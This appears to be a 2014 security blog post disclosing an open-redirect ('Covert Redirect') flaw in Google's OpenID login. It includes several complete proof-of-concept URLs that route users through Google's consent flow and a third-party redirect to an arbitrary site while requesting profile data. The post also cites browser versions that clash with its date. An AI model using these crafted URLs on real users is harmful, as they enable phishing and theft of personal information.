Friday 2 May 2014

Google Online Service OpenID Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)



















Google Online Service OpenID Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)




(1) Domain:
google.com

"Google has been estimated to run more than one million servers in data centers around the world (as of 2007). It processes over one billion search requests and about 24 petabytes of user-generated data each day (as of 2009). In December 2013, Alexa listed google.com as the most visited website in the world. Numerous Google sites in other languages figure in the top one hundred, as do several other Google-owned sites such as YouTube and Blogger. Its market dominance has led to prominent media coverage, including criticism of the company over issues such as search neutrality, copyright, censorship, and privacy." (Wikipedia)







(2) Vulnerability Description:

Google web application has a computer security problem. Hacker can exploit it by Covert Redirect cyber attacks. 


The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. 









(2.1) Vulnerability Detail:

Google's OpenID system is susceptible to Attacks. More specifically, the authentication of parameter "&openid.return_to" in OpenID system is insufficient. It can be misused to design Open Redirect Attacks to Google.



It increases the likelihood of successful Open Redirect Attacks to third-party websites, too.
Google replies "Thanks for the reporting this issue. we're already tracking[the vulnerability] ..."





The vulnerabilities occurs at page "/accounts/o8/ud?" with parameter "&openid.return_to", e.g.
https://www.google.com/accounts/o8/ud?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fjoin%252Fcontext%252FGENERAL%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.tetraph.com%25252Fessayjeans%25252Fpoems%25252Fdistance.html&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=1.AMlYA9UWc8Nk_QfiFEpKcE9A7qm0ErEkNLgQcbOwTR_aLdEyFS4ybtZQ_V9-4ARxUqsGIpPFtRd9Mw&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry [1]




Before acceptance of third-party application:
When a logged-in Google user clicks the URL ([1]) above, he/she will be asked for consent as in whether to allow a third-party website to receive his/her information. If the user clicks OK, he/she will be then redirected to the URL assigned to the parameter "&openid.return_to".
If a user has not logged onto Google and clicks the URL ([1]) above, the same situation will happen upon login.



After acceptance of third-party application:
A logged-in Google user would no longer be asked for consent and could be redirected to a webpage controlled by the attacker when he/she clicks the URL ([1]).
For a user who has not logged in, the attack could still be completed after a pop-up page that prompts him/her to log in.








(2.1.1) Google would normally allow all the URLs that belong to the domain of an authorized third-party website. However, these URLs could be prone to manipulation. For example, the "&openid.return_to" parameter in the URLs is supposed to be set by the third-party websites, but an attacker could change its value to make Attacks.



Hence, a user could be redirected from Google to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site unwillingly. This is as if the user is redirected from Google directly. The number of Google's OpenID client websites is so huge that such Attacks could be commonplace.



Before acceptance of the third-party application, Google's OpenID system makes the redirects appear more trustworthy and could potentially increase the likelihood of successful Open Redirect Attacks of third-party website.



Once the user accepts the application, the attackers could completely bypass Google's authentication system and attack more easily.



It might be of Google's interest to patch up against such attacks.







(2.2) Use one of webpages for the following tests. The webpage is "http://xingzhehong.lofter.com/". Can suppose it is malicious.



Below is an example of a vulnerable third-party domain:
rhogroupee.com



Vulnerable URL in this domain:
http://www.rhogroupee.com/join/context/GENERAL/redirect/http%3A%2F%2Fwww.tetraph.com%2Fessayjeans%2Fpoems%2Fdistance.html




Vulnerable URL from Google that is related to rhogroupee.com:
https://www.google.com/accounts/o8/ud?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fuser-social-network-login%252FauthProvider%252F10%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.rhogroupee.com%25252Fabout&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=1.AMlYA9UWc8Nk_QfiFEpKcE9A7qm0ErEkNLgQcbOwTR_aLdEyFS4ybtZQ_V9-4ARxUqsGIpPFtRd9Mw&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry




POC:
https://www.google.com/accounts/o8/ud?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fjoin%252Fcontext%252FGENERAL%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.tetraph.com%25252Fessayjeans%25252Fpoems%25252Fdistance.html&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=1.AMlYA9UWc8Nk_QfiFEpKcE9A7qm0ErEkNLgQcbOwTR_aLdEyFS4ybtZQ_V9-4ARxUqsGIpPFtRd9Mw&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry








(2.3) The following URL have the same vulnerabilities.
https://accounts.google.com/o/openid2/auth?openid.ns=http://specs.openid.net/auth/2.0&openid.claimed_id=http://specs.openid.net/auth/2.0/identifier_select&openid.identity=http://specs.openid.net/auth/2.0/identifier_select&openid.return_to=http://www.rhogroupee.com/openIdRp?redirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fuser-social-network-login%252FauthProvider%252F10%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.rhogroupee.com&openid.realm=http://www.rhogroupee.com/openIdRp&openid.aOpenIDc_handle=1.AMlYA9VvMT-wTbwpTyi--6hxkiyJYb7Oou8Wt0nqDPzqfNZBqTsNOXWhVorwkAAIZmnQXwswhZYZYQ&openid.mode=checkid_setup&openid.ns.ext1=http://openid.net/extensions/sreg/1.1&openid.ext1.optional=nickname,email,emailVerified,dob,gender,country&openid.ns.sreg=http://openid.net/sreg/1.0&openid.sreg.optional=nickname,email,emailVerified,dob,gender,country&openid.ns.ext3=http://openid.net/srv/ax/1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http://schema.openid.net/namePerson/friendly&openid.ext3.type.Email=http://schema.openid.net/contact/email&openid.ext3.type.Birth+date=http://schema.openid.net/birthDate&openid.ext3.type.Gender=http://schema.openid.net/person/gender&openid.ext3.type.Country=http://schema.openid.net/contact/country/home&openid.ext3.required=Username,Email,Birth+date,Gender,Country






POC Video:
https://www.youtube.com/watch?v=GyNGBuHNoJ0


Blog Detail:
http://tetraph.blogspot.com/2014/05/google-openid-covert-redirect.html








(3) What is Covert Redirect? 

Covert Redirect is a class of security bugs disclosed in May 2014. It is an application that takes a parameter and redirects a user to the parameter value without sufficient validation. This often makes use of Open Redirect and XSS (Cross-site Scripting) vulnerabilities in third-party applications.


Covert Redirect is also related to single sign-on. It is known by its influence on OAuth and OpenID. Hacker may use it to steal users' sensitive information. Almost all OAuth 2.0 and OpenID providers worldwide are affected. Covert Redirect can work together with CSRF (Cross-site Request Forgery) as well. After Covert Redirect was published, it is kept in some common databases such as SCIP, OSVDB, Bugtraq, and X-Force. Its scipID is 13185, while OSVDB reference number is 106567. Bugtraq ID: 67196.  X-Force reference number is 93031.







Discover and Reporter:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)








Related Articles:
http://tetraph.com/security/covert-redirect/google-openid-covert-redirect-vulnerability/
https://twitter.com/tetraphibious/status/559169163394940929
https://hackertopic.wordpress.com/2014/08/06/google-service-exploit/
http://www.inzeed.com/kaleidoscope/covert-redirect/google-openid-covert-redirect-vulnerability/
http://tetraph.blog.163.com/blog/static/23460305120144385547287/
http://securitypost.tumblr.com/post/119439859067/itinfotech-id-oauth
http://securityrelated.blogspot.com/2014/06/google-web-service-bug.html
http://whitehatpost.lofter.com/post/1cc773c8_706b637
https://tetraph.wordpress.com/2014/07/11/google-service-exploit/
http://computerobsess.blogspot.com/2014/06/google-web-service-bug.html





No comments:

Post a Comment